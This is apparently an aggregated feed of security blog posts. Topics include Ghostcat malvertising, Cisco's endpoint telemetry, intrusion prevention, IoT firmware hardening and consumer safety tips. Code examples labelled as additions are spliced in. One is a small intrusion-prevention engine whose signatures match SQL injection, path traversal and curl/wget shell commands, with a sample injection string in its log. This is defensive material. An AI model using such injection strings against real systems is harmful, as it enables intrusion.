October is finally upon us, and things are spookier than usual. One ghost causing some hocus pocus across the World Wide Web is Ghostcat-3PC, a browser-hijacking malware that has launched at least 18 different malvertising campaigns in the last three months. According to SC Magazine, Ghostcat’s goal is to hijack users’ mobile browsing sessions, and it is specifically targeting website visitors in the U.S. and Europe.

How exactly does this ghost begin its haunting? The infection begins when a user visits a particular website and is served a malicious advertisement. When this occurs, Ghostcat fingerprints the browser (that is, it collects information about the device for the purpose of identifying it) to determine whether the ad is running on a genuine webpage. Ghostcat also checks whether the ad is running on one of the more than 100 online publishers’ pages that have been specifically targeted by this campaign. If both of these conditions are met, the malware serves a malicious URL linked to the ad.

From there, this malicious URL delivers obfuscated JavaScript, code whose source has been deliberately made hard to read. The attackers behind Ghostcat use this technique to evade the publishers’ ad blockers, preventing them from detecting malicious content. The code also checks for additional conditions necessary for the attack: that it is running on a mobile device in a mobile-specific browser, that the device is located in a targeted country, and that it is running on a genuine website rather than a testing environment. If the malware concludes that the browsing environment matches the attackers’ target profile, it serves a fraudulent pop-up, leading the user to malicious content.

So, what are some proactive steps users can take to avoid being haunted by Ghostcat? Follow these tips to avoid the malware’s hocus pocus:

  • Watch what you click. Avoid clicking on unknown links or suspicious pop-ups, especially those that come from someone you don’t know.
  • Be selective about which sites you visit. Only use well-known and trusted sites. One way to determine if a site is potentially malicious is by checking its URL. If the URL address contains multiple grammar or spelling errors and suspicious characters, avoid interacting with the site altogether.
  • Surf the web safely. You can use a tool like McAfee WebAdvisor, which flags sites that may be malicious without your realizing it.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post Is Your Browser Haunted With Ghostcat Malware? appeared first on McAfee Blogs.

Using CESA to Solve Endpoint Blindness for a World Class InfoSec Team

Cisco has an amazing set of products like AMP for Endpoints and Cisco Umbrella protecting devices from advanced malware threats.  There were other user and endpoint scenarios that remained unsolved until we introduced the new Cisco Endpoint Security Analytics (CESA) solution that was recently announced.  CESA provides an unprecedented level of endpoint and user networking visibility built on Cisco AnyConnect Network Visibility Module (NVM) endpoint telemetry and Splunk Enterprise.   Underlying the NVM technology is a protocol called nvzFlow (en-vizzy-flow) that I have blogged about in the past.


Why Did We Build CESA?

The CESA solution was originally developed by the Office of the Security CTO and then integrated into Cisco AnyConnect and Splunk products to solve a set of issues for Cisco InfoSec.  Cisco InfoSec realized that getting all the endpoint visibility they needed to perform incident response was a challenge. There were also endpoint security blind spots as more Cisco employees were working off premise and connecting to both enterprise and cloud resources.  They needed a way to collect and store a year of data for analysis of incidents while also getting information in real‑time to see what is happening in the network.  You can read more about the Cisco InfoSec use case in their case study on CESA.

The Office of the Security CTO looks at current and future customer problems that are not being solved by existing technology and then comes up with ideas on how to solve them. My fellow co-inventors, Andrew Zawadowskiy and Donovan O’Hara from the CTO Advanced Development team, built the initial Proof of Concept and then worked on the final product release with the AnyConnect development team.

As we thought about ways to solve the problems Cisco InfoSec was facing, we wanted to do it in a way that built on standard technology, so that not only could Cisco Stealthwatch and Cisco Tetration support it, but it would also provide an ecosystem in which key partners could participate. This is why we chose to build on IPFIX. It is the perfect protocol on which to build the enhanced context found in nvzFlow. What do we mean by “Enhanced Context”?

The 5 key endpoint visibility categories conveyed by the protocol or “Enhanced Context” are:

  • User
  • Device
  • Application
  • Location
  • Destination

At the end of the blog will be a helpful table to show you details of the enhanced context that is provided.
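To make the “enhanced context” concrete, here is an added example (not Cisco’s or nvzFlow’s code) of how IPFIX lets an exporter carry the five categories above next to ordinary flow fields: a template set declares enterprise-specific, variable-length elements, and a data set then carries them. The element ids and the Private Enterprise Number are constructed placeholders, not nvzFlow’s real assignments; the sample flow is constructed too.

```python
"""Minimal IPFIX (RFC 7011) encoder/decoder carrying nvzFlow-style enhanced context.
Added example: the enterprise element ids and PEN are constructed placeholders, not nvzFlow's."""
import struct

IPFIX_VERSION = 10
TEMPLATE_SET_ID = 2
TEMPLATE_ID = 256          # data sets with id >= 256 refer to a template
VARLEN = 0xFFFF            # RFC 7011 marker for variable-length fields
PEN = 12345                # placeholder Private Enterprise Number (constructed)

# (name, element id, enterprise number or None for IANA-registered, field length)
FIELDS = [
    ("sourceIPv4Address", 8, None, 4),
    ("destinationIPv4Address", 12, None, 4),
    ("destinationTransportPort", 11, None, 2),
    ("octetDeltaCount", 1, None, 8),
    ("userName", 1, PEN, VARLEN),              # User
    ("deviceName", 2, PEN, VARLEN),            # Device
    ("processName", 3, PEN, VARLEN),           # Application
    ("processHashSha256", 4, PEN, VARLEN),     # Application (hash of the binary)
    ("networkLocation", 5, PEN, VARLEN),       # Location (e.g. "on-prem" / "vpn")
    ("destinationHostname", 6, PEN, VARLEN),   # Destination (domain behind the IP)
]
_BY_KEY = {(ie, pen): (name, length) for name, ie, pen, length in FIELDS}

def _encode_value(name, length, value):
    if name.endswith("IPv4Address"):
        return bytes(int(o) for o in value.split("."))
    if length == VARLEN:                      # 1-byte length, or 255 followed by a 2-byte length
        raw = value.encode("utf-8")
        prefix = bytes([len(raw)]) if len(raw) < 255 else b"\xff" + struct.pack("!H", len(raw))
        return prefix + raw
    return int(value).to_bytes(length, "big")

def _set(set_id, body):
    return struct.pack("!HH", set_id, 4 + len(body)) + body

def encode_message(records, export_time=0, sequence=0, domain=1):
    """Build one IPFIX message: a template set followed by a data set that uses it."""
    tmpl = struct.pack("!HH", TEMPLATE_ID, len(FIELDS))
    for _, ie, pen, length in FIELDS:
        if pen is None:
            tmpl += struct.pack("!HH", ie, length)
        else:                                  # enterprise bit set, PEN follows the length
            tmpl += struct.pack("!HHI", 0x8000 | ie, length, pen)
    data = b"".join(b"".join(_encode_value(n, l, rec[n]) for n, _, _, l in FIELDS) for rec in records)
    body = _set(TEMPLATE_SET_ID, tmpl) + _set(TEMPLATE_ID, data)
    return struct.pack("!HHIII", IPFIX_VERSION, 16 + len(body), export_time, sequence, domain) + body

def decode_message(buf):
    """Parse one IPFIX message, learning templates as they appear; returns a list of dict records."""
    version, length, _, _, _ = struct.unpack("!HHIII", buf[:16])
    if version != IPFIX_VERSION or length != len(buf):
        raise ValueError("not a well-formed IPFIX message")
    templates, records, off = {}, [], 16
    while off < length:
        set_id, set_len = struct.unpack("!HH", buf[off:off + 4])
        end, pos = off + set_len, off + 4
        if set_id == TEMPLATE_SET_ID:
            while pos + 4 <= end:
                tid, count = struct.unpack("!HH", buf[pos:pos + 4]); pos += 4
                spec = []
                for _ in range(count):
                    ie, flen = struct.unpack("!HH", buf[pos:pos + 4]); pos += 4
                    pen = None
                    if ie & 0x8000:                # enterprise-specific element
                        ie, (pen,) = ie & 0x7FFF, struct.unpack("!I", buf[pos:pos + 4]); pos += 4
                    spec.append((ie, pen, flen))
                templates[tid] = spec
        elif set_id >= 256:
            if set_id not in templates:
                raise ValueError(f"data set {set_id} arrived before its template")
            while pos < end:
                rec = {}
                for ie, pen, flen in templates[set_id]:
                    if flen == VARLEN:
                        flen = buf[pos]; pos += 1
                        if flen == 255:
                            (flen,) = struct.unpack("!H", buf[pos:pos + 2]); pos += 2
                    raw = buf[pos:pos + flen]; pos += flen
                    name, declared = _BY_KEY.get((ie, pen), (f"ie{ie}@{pen}", flen))
                    if name.endswith("IPv4Address"):
                        rec[name] = ".".join(str(b) for b in raw)
                    elif declared == VARLEN:
                        rec[name] = raw.decode("utf-8")
                    else:
                        rec[name] = int.from_bytes(raw, "big")
                records.append(rec)
        off = end
    return records

SAMPLE_FLOW = {  # constructed: the context an NVM-style agent would attach to one connection
    "sourceIPv4Address": "10.1.2.3", "destinationIPv4Address": "203.0.113.10",
    "destinationTransportPort": 443, "octetDeltaCount": 48213, "userName": "alice",
    "deviceName": "LAPTOP-01", "processName": "chrome.exe", "processHashSha256": "<placeholder-sha256>",
    "networkLocation": "vpn", "destinationHostname": "updates.example.com",
}
```

Because the template travels in-band, a collector such as the Splunk add-on can decode enterprise fields it has never seen before, which is the property that makes the protocol extensible for partners.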

Working with Great Partners like Splunk and Samsung

One of the key features of CESA is Splunk Enterprise, which performs the analytics and alerting on the NVM telemetry, turning it into actionable events. The new CESA Built on Splunk product, available exclusively from Cisco, provides a Splunk package customized and priced specifically for analyzing NVM telemetry.  Cisco InfoSec has been using the CESA solution for over two years now.  As noted earlier, you can read more about it in their Case Study.

Splunk Enterprise is a fantastic tool. It was really easy for us to take the Cisco AnyConnect NVM data and not only import it into Splunk, but also quickly create a high-value set of dashboards and reports from the data. There are two components in the Splunk store that make up the solution: Cisco AnyConnect Network Visibility Module (NVM) App for Splunk and Cisco NVM Technology Add-on for Splunk. Because NVM produces so much high-value data, Splunk created a special per-endpoint license, available exclusively from Cisco, that makes budgeting predictable and saves you money. We also put together a helpful deployment guide to get you going.

Below is an example of the dozens of reports available in the AnyConnect NVM Splunk Dashboard.
As you can see the solution provides visibility into what applications are connecting to what domains and how much data is being transmitted/received.


From there, you can then drill down on the specific application and obtain finer grained details including the SHA256 hash of the process, the names of domains and IP addresses it connected to, what account it is running under, etc.  Just click on the specific element and it will take you to an investigation page for that observable.

You can easily integrate your favorite investigation tools right into the Splunk Enterprise dashboards.  For example, you can pivot from a DNS domain name observable into Cisco Umbrella, Talos Intelligence or Cisco Threat Response with just a couple lines of HTML.  This will allow you to obtain a threat disposition on the domain.

Similarly, you can take the SHA256 hash observable and pivot right into AMP for Endpoints, ThreatGrid or Cisco Threat Response.  This will allow you to obtain a threat disposition on the binary.

We’ve provided those integrations for you in the default dashboards. You can easily add more just by editing them to include your favorite tools.  Let us know if there is anything else that would be useful in the default screens.


Samsung has been another excellent partner from the start.  We have worked with them closely on their Knox program for a number of years with AnyConnect integrations and neat features like per-app VPN.  When we explained to them what we wanted to do with Cisco AnyConnect NVM, they were excited to help and developed the Network Platform Analytics (NPA) framework to make it possible.  It is the only framework available on mobile platforms to support Cisco AnyConnect NVM.  The best part is that you can enable and provision this capability using your favorite Enterprise Mobility Management (EMM) solution – no special device-mode needed!  Keep an eye out for a forthcoming quick‑start guide on this technology.  NVM is also available on Windows, MacOS and Linux platforms.

Those are some of the high points of the CESA Built on Splunk solution.  If you’d like to get into further technical details on the solution architecture and NVM telemetry itself, see my post on our Cisco Community Page.

October 2019 Patch Tuesday forecast: Be sure to apply service stack updates

School is back in session across most of the world, and here in the United States most students look forward to a school holiday called ‘fall break.’ While we never have a Patch Tuesday off, this may actually be a bit of a fall break for most of us, because I don’t anticipate many updates this month. Before we get into the forecast details, I’d like to provide some information around service stack updates (SSUs) and how … More

The post October 2019 Patch Tuesday forecast: Be sure to apply service stack updates appeared first on Help Net Security.

Effective methods for enterprises to detect and prevent network intrusions


Enterprise networks are susceptible to damaging intrusions. Some of these intrusions take the form of systems on the network running unauthorized applications that carry vulnerabilities and backdoors. When such vulnerabilities are exploited, unauthorized access to the network follows, which can have a range of unpleasant consequences for businesses.

To prevent such unauthorized intrusions on the network, it is essential to deploy a security solution that can detect these events and work actively towards prevention. An Intrusion Detection System (IDS) monitors all incoming and outgoing network activity and identifies any signs of intrusion into your systems that could jeopardize your business. Its main function is to raise an alert when it discovers such activity, and hence it is commonly described as a passive monitoring system.

Nowadays, IDS has received a facelift. Its successor, the Intrusion Prevention System (IPS), is helping enterprises in a big way to cope with the menace of cyber-attacks that arrive over business networks.

IPS is a salient feature of Unified Threat Management (UTM), a highly effective product for blocking threats that penetrate via business networks.

What is an IPS and how does it help in the prevention of network intrusions?

An Intrusion Prevention System (IPS) is a step ahead of an IDS in its capabilities. The system detects and blocks anomalies on a company’s network. It does that through:

  • Monitoring routers, firewalls, key servers and files, and matching intrusions against a signature database in the event of a breach
  • Raising an alarm with targeted notifications to key personnel when there is a breach
  • Keeping the number of false alarms low by cross-verifying against the signature database
  • Detecting patterns by identifying various types of attacks and providing insights to administrators for further protection
  • Maintaining regulatory compliance by providing greater visibility across the entire network

How does UTM as a whole help in defending your business network?

Seqrite’s Unified Threat Management (UTM) offers a one-stop solution for all enterprise security needs which includes intrusion detection and prevention as a standard feature.

UTM’s in-built IDS and IPS components keep enterprises safe by:

  • Monitoring, evaluating and catching threats in real-time
  • Preventing Denial of Service (DoS)/Distributed Denial of Service (DDoS) attacks
  • Preventing the discovery of open ports by attackers
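The IPS behaviours listed in the two sets of bullets above (signature matching, alarms, DoS/DDoS prevention and blocking port discovery) can be sketched as one small engine. This is an added example with constructed log lines, not Seqrite’s engine; the log format, the signatures and the rate thresholds are assumptions.

```python
"""Miniature IPS: a signature database over request payloads plus rate rules for
connection floods (DoS) and port scans. Added example with constructed log lines,
not Seqrite's engine; the log format and thresholds are assumptions."""
import re
from collections import defaultdict, deque

# Signature database entries: id, description, payload pattern, action on match
SIGNATURES = [
    ("SIG-1001", "SQL injection attempt", re.compile(r"(?i)union\s+select|'\s*or\s*'1'\s*=\s*'1"), "block"),
    ("SIG-1002", "Directory traversal", re.compile(r"\.\./\.\./"), "block"),
    ("SIG-1003", "Shell command in web request", re.compile(r"(?i)[;|]\s*(?:cat|wget|curl)\s"), "alert"),
]
DOS_THRESHOLD, DOS_WINDOW = 20, 1.0     # more than 20 events from one source within 1 s
SCAN_THRESHOLD, SCAN_WINDOW = 10, 5.0   # more than 10 distinct ports from one source within 5 s

# Assumed log format: "<epoch seconds> <src ip> -> <dst ip>:<port> <payload>"
LINE_RE = re.compile(r"^(?P<ts>\d+(?:\.\d+)?) (?P<src>[\d.]+) -> (?P<dst>[\d.]+):(?P<port>\d+) (?P<payload>.*)$")


class MiniIPS:
    def __init__(self):
        self.recent = defaultdict(deque)   # src -> deque of (timestamp, dst port) for the rate rules
        self.blocked = set()               # sources already blocked: further traffic is dropped

    def process(self, line):
        """Return the verdict for one log line: allow, alert, block or drop."""
        m = LINE_RE.match(line)
        if not m:
            return {"verdict": "ignore", "reason": "unparsable line"}
        ts, src, port = float(m["ts"]), m["src"], int(m["port"])
        if src in self.blocked:
            return {"verdict": "drop", "src": src, "reason": "source already blocked"}
        q = self.recent[src]
        q.append((ts, port))
        while q and ts - q[0][0] > max(DOS_WINDOW, SCAN_WINDOW):   # forget events outside every window
            q.popleft()
        for sig_id, desc, pattern, action in SIGNATURES:             # signature match comes first
            if pattern.search(m["payload"]):
                if action == "block":
                    self.blocked.add(src)
                return {"verdict": action, "src": src, "signature": sig_id, "reason": desc}
        if sum(1 for t, _ in q if ts - t <= DOS_WINDOW) > DOS_THRESHOLD:
            self.blocked.add(src)
            return {"verdict": "block", "src": src, "signature": "RATE-DOS", "reason": "connection flood"}
        if len({p for t, p in q if ts - t <= SCAN_WINDOW}) > SCAN_THRESHOLD:
            self.blocked.add(src)
            return {"verdict": "block", "src": src, "signature": "RATE-SCAN", "reason": "port scan"}
        return {"verdict": "allow", "src": src}


def run(lines):
    """Feed a sequence of log lines through one IPS instance and collect the verdicts."""
    ips = MiniIPS()
    return [ips.process(line) for line in lines]


# Constructed sample log: an SQL injection probe, a 12-port scan and a 25-packet flood
SAMPLE_LOG = [
    "1000.0 198.51.100.7 -> 10.0.0.5:80 GET /index.html",
    "1000.2 198.51.100.7 -> 10.0.0.5:80 GET /login?user=admin' OR '1'='1",
    "1000.3 198.51.100.7 -> 10.0.0.5:80 GET /index.html",
]
SAMPLE_LOG += [f"1001.{i:02d} 203.0.113.9 -> 10.0.0.5:{1000 + i} SYN" for i in range(12)]
SAMPLE_LOG += [f"1010.{i:03d} 192.0.2.4 -> 10.0.0.5:443 SYN" for i in range(25)]

if __name__ == "__main__":
    for line, verdict in zip(SAMPLE_LOG, run(SAMPLE_LOG)):
        if verdict["verdict"] != "allow":
            print(verdict["verdict"].upper(), line, "--", verdict.get("reason"))
```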

Seqrite UTM’s IPS acts as a security barrier against unwanted intrusions into your network and forestalls a broad range of DoS and DDoS attacks before they penetrate the network. Deploying this level of protection can benefit an enterprise in various ways, including:

  • Providing a snapshot of network security at one glance
  • Protection of enterprise assets within the network
  • Triggers raised on detection of any suspected breach or activity in the network
  • A holistic approach towards prevention of intrusions

Apart from its powerful Intrusion Prevention System, Seqrite’s Unified Threat Management (UTM) solution is equipped with other key features like Gateway Antivirus, Web Filtering, High Availability, Centralized Management System (CMS), etc. to ensure it acts as the first line of defence against all network attacks.

The post Effective methods for enterprises to detect and prevent network intrusions appeared first on Seqrite Blog.

Enterprises leaving themselves vulnerable to cyberattacks by failing to prioritize PKI security

IoT is one of the fastest growing trends in technology today, yet enterprises are leaving themselves vulnerable to dangerous cyberattacks by failing to prioritize PKI security, according to new research from nCipher Security. The 2019 Global PKI and IoT Trends Study, conducted by research firm the Ponemon Institute and sponsored by nCipher Security, is based on feedback from more than 1,800 IT security practitioners in 14 countries/regions. The study found that IoT is the fastest-growing … More

The post Enterprises leaving themselves vulnerable to cyberattacks by failing to prioritize PKI security appeared first on Help Net Security.

Being compliant with laws and regulations is not a guarantee against data breaches

Compliance is not a guarantee against data breaches. These are the results of the Advisera survey carried out with 605 respondents, coming from countries on five continents, from various industries, mostly from smaller and medium-size companies, and acting predominantly in IT and security positions. Security and compliance are tightly related. Nearly 85% of respondents consider security and compliance to be highly related and feel that they need to be implemented together. “This perception of respondents … More

The post Being compliant with laws and regulations is not a guarantee against data breaches appeared first on Help Net Security.

Measuring the Security of IoT Devices

In August, CyberITL completed a large-scale survey of software security practices in the IoT environment, by looking at the compiled software.

Data Collected:

  • 22 Vendors
  • 1,294 Products
  • 4,956 Firmware versions
  • 3,333,411 Binaries analyzed
  • Date range of data: 2003-03-24 to 2019-01-24 (varies by vendor, most up to 2018 releases)

[...]

This dataset contains products such as home routers, enterprise equipment, smart cameras, security devices, and more. It represents a wide range of devices found in home, enterprise, or government deployments.

Vendors are Asus, Belkin, DLink, Linksys, Moxa, Tenda, Trendnet, and Ubiquiti.

CyberITL's methodology is not source code analysis. They look at the actual firmware. And they don't look for vulnerabilities; they look for secure coding practices that indicate that the company is taking security seriously, and whose lack pretty much guarantees that there will be vulnerabilities. These include address space layout randomization and stack guards.

A summary of their results:

CITL identified a number of important takeaways from this study:

  • On average, updates were more likely to remove hardening features than add them.
  • Within our 15 year data set, there have been no positive trends from any one vendor.
  • MIPS is both the most common CPU architecture and least hardened on average.
  • There are a large number of duplicate binaries across multiple vendors, indicating a common build system or toolchain.

Their website contains the raw data.
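The kind of header-level check CITL's survey performs, as an added example that is not CITL's own tooling: it reads ELF64 headers and reports whether a compiled binary was built position-independent (so ASLR applies), with a non-executable stack and with RELRO. The two images it inspects are constructed header-only blobs, not real firmware, and the stack-canary check is deliberately left out because that needs the symbol table rather than the headers.

```python
"""Header-level hardening check for compiled ELF64 binaries (added illustration)."""
import struct
from dataclasses import dataclass

ET_EXEC, ET_DYN = 2, 3                        # e_type: fixed-address vs position-independent
EM_X86_64, EM_MIPS = 0x3E, 0x08               # e_machine values (MIPS: CITL's least-hardened arch)
PT_GNU_STACK, PT_GNU_RELRO = 0x6474E550, 0x6474E552
PF_X = 0x1
EHDR_FMT, PHDR_FMT = "<HHIQQQIHHHHHH", "<IIQQQQQQ"   # little-endian ELF64 layouts


@dataclass(frozen=True)
class Hardening:
    machine: int
    pie: bool        # ET_DYN executable: loadable at a random base, so ASLR applies
    nx_stack: bool   # PT_GNU_STACK present without PF_X: non-executable stack
    relro: bool      # PT_GNU_RELRO present: relocation tables made read-only after load


def parse_elf64(data: bytes) -> Hardening:
    """Read the ELF header and program headers; reject anything but little-endian ELF64."""
    if data[:4] != b"\x7fELF" or data[4] != 2 or data[5] != 1:
        raise ValueError("expected a little-endian ELF64 image")
    (e_type, e_machine, _ver, _entry, e_phoff, _shoff, _flags,
     _ehsize, e_phentsize, e_phnum, *_rest) = struct.unpack_from(EHDR_FMT, data, 16)
    nx_stack = False   # no PT_GNU_STACK at all: loader defaults to an executable stack
    relro = False
    for i in range(e_phnum):
        p_type, p_flags = struct.unpack_from("<II", data, e_phoff + i * e_phentsize)
        if p_type == PT_GNU_STACK:
            nx_stack = not (p_flags & PF_X)
        elif p_type == PT_GNU_RELRO:
            relro = True
    return Hardening(e_machine, pie=(e_type == ET_DYN), nx_stack=nx_stack, relro=relro)


def missing_features(data: bytes) -> list:
    """Protections the binary lacks: scoring build practice, not hunting bugs.
    Stack canaries are not checked here; that needs __stack_chk_fail in the symbol table."""
    h = parse_elf64(data)
    checks = (("PIE/ASLR", h.pie), ("NX stack", h.nx_stack), ("RELRO", h.relro))
    return [name for name, ok in checks if not ok]


def build_sample(e_type: int, machine: int, phdrs) -> bytes:
    """Constructed header-only ELF64 image (no code or data) for the demonstration."""
    ident = b"\x7fELF" + bytes([2, 1, 1, 0]) + bytes(8)      # 64-bit, little-endian, version 1
    ehdr = struct.pack(EHDR_FMT, e_type, machine, 1, 0, 64, 0, 0, 64, 56, len(phdrs), 64, 0, 0)
    body = b"".join(struct.pack(PHDR_FMT, t, f, 0, 0, 0, 0, 0, 0) for t, f in phdrs)
    return ident + ehdr + body


# Constructed samples: a well-built x86-64 binary and a MIPS binary built with no hardening.
HARDENED_SAMPLE = build_sample(ET_DYN, EM_X86_64, [(PT_GNU_STACK, 0x6), (PT_GNU_RELRO, 0x4)])
WEAK_SAMPLE = build_sample(ET_EXEC, EM_MIPS, [(PT_GNU_STACK, 0x7)])   # RWX stack, fixed address

if __name__ == "__main__":
    for label, blob in (("hardened", HARDENED_SAMPLE), ("weak", WEAK_SAMPLE)):
        print(label, parse_elf64(blob), "missing:", missing_features(blob) or "none")
```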

Chapter Preview: Birth to Age 2 – First Footprints

When your baby is on the way, their privacy and digital security is probably the last thing you have on your mind. At least it’s way down there on the list—of course it is! You’re preparing for a bright, joyous addition to your family and home. Everything you’re doing is intended to create an environment that is safe and comfortable, so your baby knows a warm and loving world right from the start. Not to mention, you and your family are anticipating how much you’ll enjoy these milestones.

Part of the enjoyment includes sharing these moments, which is mainly done online these days. (When’s the last time you took a picture on film and had it printed?) From digital invitations, to baby showers, and ultrasound pictures posted on social media—the weeks and months leading up to birth are a celebration as well. And that’s where your baby’s data lake gets its initial drops. Your posts on social media make up the first little digital streams feeding their data lake, along with anything else you share about them online.

When my children were babies we spent a lot of time “baby proofing” the house. You know, putting special locks on the kitchen cabinets, plastic covers on electrical outlets, baby gates, and more. Today that behavior needs to extend online. We need to be the guardians of our baby’s privacy, identity, and security until they get to the age where they understand what’s at risk and can protect themselves.


No doubt you will want to share all those precious moments as your bundle of joy fills your life with happiness, despite the possible risks. With that in mind, there’s an entire chapter in “Is Your Digital Front Door Unlocked?” dedicated to your baby’s first steps online, offering suggestions on what constitutes a healthy balance of what should and should not be shared. It also looks at other important considerations that you may not have thought of, such as getting your baby a Web address and monitoring their identity to make sure an identity thief hasn’t hijacked it—plenty of things many parents wouldn’t think of, but should, given the way our world works today.

Gary Davis’ book, Is Your Digital Front Door Unlocked?, is available September 5, 2019 and can be ordered at amazon.com.

The post Chapter Preview: Birth to Age 2 – First Footprints appeared first on McAfee Blogs.

Good cybersecurity comes from focusing on the right things, but what are they?

“There is no wrong way into the security field and it’s never too late to make a career switch that will take you there,” says Mark Orlando, CTO at Raytheon Cyber Protection Solutions. If you think that’s easy for him to say, consider his education and employment twists and turns before getting into technology and, ultimately, into cybersecurity: he was an art and design student, then a Marine, and later a UPS truck loader. While … More

The post Good cybersecurity comes from focusing on the right things, but what are they? appeared first on Help Net Security.

How security programs and breach history influence company valuations

96% of cybersecurity professionals indicated that cybersecurity readiness factors into the calculation when they are assessing the overall monetary value of a potential acquisition target, an (ISC)2 survey reveals. (ISC)2 surveyed 250 U.S.-based professionals with mergers and acquisitions (M&A) expertise. Survey respondents unanimously agreed that cybersecurity audits are not only commonplace but are actually standard practice during M&A transaction preparation. The research also found that the results of such due diligence can have a tangible … More

The post How security programs and breach history influence company valuations appeared first on Help Net Security.

Executives have to make cybersecurity a priority in order to secure their business

Businesses and organizations of all sizes have steadily begun to recognize the importance of cybersecurity to their success. As spending and awareness of the importance of cybersecurity increases, so does the demand for intelligence about how best to spend those funds and what security leaders can expect in today’s constantly evolving attack surfaces. To help give business leaders insight into the threat landscape to better mitigate risk, Optiv Security has published its 2019 Cyber Threat … More

The post Executives have to make cybersecurity a priority in order to secure their business appeared first on Help Net Security.

Security and compliance gaps of ineffective employee onboarding and offboarding

There are significant gaps in the compliant management of employee resources throughout the employment lifecycle. Just 15% of employees have all the resources they require to be productive on day one; further, more than half (52%) of IT professionals know someone who still has access to a former employer’s applications and data, according to Ivanti. When it comes to employee onboarding, 38% of IT professionals report it takes between two and four days to get … More

The post Security and compliance gaps of ineffective employee onboarding and offboarding appeared first on Help Net Security.

The 5 biggest examples of executive threats and how to prevent them

Many executives focus their security efforts and budgets solely on physical threats, but attacks targeting an executive’s digital presence can be just as dangerous. Criminals are looking to exploit the wealth of high-profile and high net-worth individuals—or cause them embarrassment or personal harm—at an unprecedented rate. And, as the most abundant source of company secrets and IP, they’re a primary attack vector of their businesses too. Attacks on VIPs involve attempts at accessing their sensitive … More

The post The 5 biggest examples of executive threats and how to prevent them appeared first on Help Net Security.

49% of infosec pros are awake at night worrying about their organization’s cybersecurity

Six in every ten businesses have experienced a breach in the last three years. At least a third of infosec professionals (36%) whose employers had not recently been a victim of a cyber attack also believe that it is likely that they are currently facing one without knowing about it. This may be an indicator of a bumper year for breaches, as the total number of organizations reporting breaches in 2018 only came … More

The post 49% of infosec pros are awake at night worrying about their organization’s cybersecurity appeared first on Help Net Security.

Massive uptick in eCrime campaigns, retail among top targeted industries

There has been a massive uptick in eCrime cyber activity, a CrowdStrike report reveals. As Gartner states in the 2019 Magic Quadrant for Endpoint Protection Platform, “The skills requirement of EDR solutions compounded by the skills gap in most organizations is an impediment to the adoption of EDR in the mainstream market. As a result, product vendors are increasingly offering a fusion of products and services ranging from light incident response and monitoring through full … More

The post Massive uptick in eCrime campaigns, retail among top targeted industries appeared first on Help Net Security.

Aussies Fear Snakes, Spiders and Getting Hacked

Fears and phobias. We all have them. But what are your biggest ones? I absolutely detest snakes but spiders don’t worry me at all. Well, new research by McAfee shows that cybercriminals and the fear of being hacked are now the 5th greatest fear among Aussies.

With news of data breaches and hacking crusades filling our news feed on a regular basis, many of us are becoming more aware and concerned about the threats we face in our increasingly digital world. And McAfee’s latest research confirms this, with hackers making their way into Australia’s Top 10 Fears.

According to research conducted by McAfee, snakes are the top phobia for Aussies followed by spiders, heights and sharks. Cybercriminals and the fear of being hacked come in 5th place, beating the dentist, bees, ghosts, aeroplane travel and clowns!

Aussie Top 10 Fears and Phobias

  1. Snakes
  2. Spiders
  3. Heights
  4. Sharks
  5. Hackers/Cybercriminals
  6. The dentist
  7. Bees or wasps
  8. Ghosts
  9. Aeroplane travel
  10. Clowns

Why Do We Have Phobias?

Fears and phobias develop when we perceive that we are at risk of pain or, worse still, death. And while almost a third of respondents nominated snakes as their number one fear, there is less than a one-in-fifty-thousand chance of being bitten badly enough by a snake to warrant going to hospital in Australia, according to research from the Internal Medicine Journal.

In contrast, McAfee’s analysis of more than 108 billion potential online threats between October and December 2018 identified 202 million of these threats as genuine risks. With a global population of 7.5 billion, that means there is approximately a one in 37 chance of being targeted by cybercrime. Now while this is not a life-threatening situation, these statistics show that the chance of us being affected by an online threat is very real.

What Are Our Biggest Cyber Fears?

According to the research, 82% of Aussies believe that being hacked is a growing or high concern. And when you look at the sheer number of reported data breaches so far this year, these statistics make complete sense. Data breaches have affected Bunnings staff, Federal Parliament staff, Marriott guests, Victorian Government staff, QLD Fisheries members, Skoolbag app users and Big W customers plus many more.

Almost 1 in 5 (19%) of those interviewed said their top fear at work is doing something that will result in a data security breach, leak sensitive information or infect their corporate IT systems.

The fear that we are in the midst of a cyberwar is another big concern for many Aussies. Cyberwar can be explained as a computer or network-based conflict where parties try to disrupt or take ownership of the activities of other parties, often for strategic, military or cyberespionage purposes. 55% of Aussies believe that a cyberwar is happening right now but we just don’t know about it. And a fifth believe cyber warfare is the biggest threat to our nation.

What Can We Do to Address Our Fear of Being Hacked?

Being proactive about protecting your online life is the absolute best way of reducing the chances of being hacked or being affected by a data breach. Here are my top tips on what you can do now to protect yourself:

  1. Be Savvy with Your Passwords

Using a password manager to create unique and complex passwords for each of your online accounts will definitely improve your online safety. If each of your online accounts has a unique password and you are involved in a breach, the hacker won’t be able to use the stolen password details to log into any of your other accounts.

  2. Stop AutoFill on Chrome

Storing your financial data within your browser and being able to populate online forms within seconds makes the autofill function very attractive; however, it is risky. Autofill will automatically fill out all forms on a page regardless of whether you can see all the boxes. You may just think you are automatically entering your email address into an online form; however, a savvy hacker could easily design an online form with hidden boxes designed to capture your financial information. So remove all your financial information from Autofill. I know this means you will have to manually enter information each time you purchase, but your personal data will be better protected.

  3. Think Before You Click

One of the easiest ways for a cybercriminal to compromise their victim is by using phishing emails to lure consumers into clicking links for products or services that could lead to malware, or a phoney website designed to steal personal information. If the deal seems too good to be true, or the email was not expected, always check directly with the source.

  4. Stay Protected While You Browse

It’s important to put the right security solutions in place in order to surf the web safely. Add an extra layer of security to your browser with McAfee WebAdvisor.

  5. Always Connect with Caution

I know public Wi-Fi might seem like a good idea, but if consumers are not careful, they could be unknowingly exposing personal information or credit card details to cybercriminals who are snooping on the network. If you are a regular Wi-Fi user, I recommend investing in a virtual private network (VPN) such as McAfee’s Safe Connect, which will ensure your connection is completely secure and that your data remains safe.

While it is tempting, putting our head in the sand and pretending hackers and cybercrime don’t exist puts ourselves and our families at even more risk! Facing our fears and making an action plan is the best way of reducing our worry and stress. So, please commit to being proactive about your family’s online security. Draw up a list of what you can do today to protect your tribe. And if you want to receive regular updates about additional ways you can keep your family safe online, check out my blog.

‘till next time.

Alex x

The post Aussies Fear Snakes, Spiders and Getting Hacked appeared first on McAfee Blogs.

Cyber risks are the top concern among businesses of all sizes

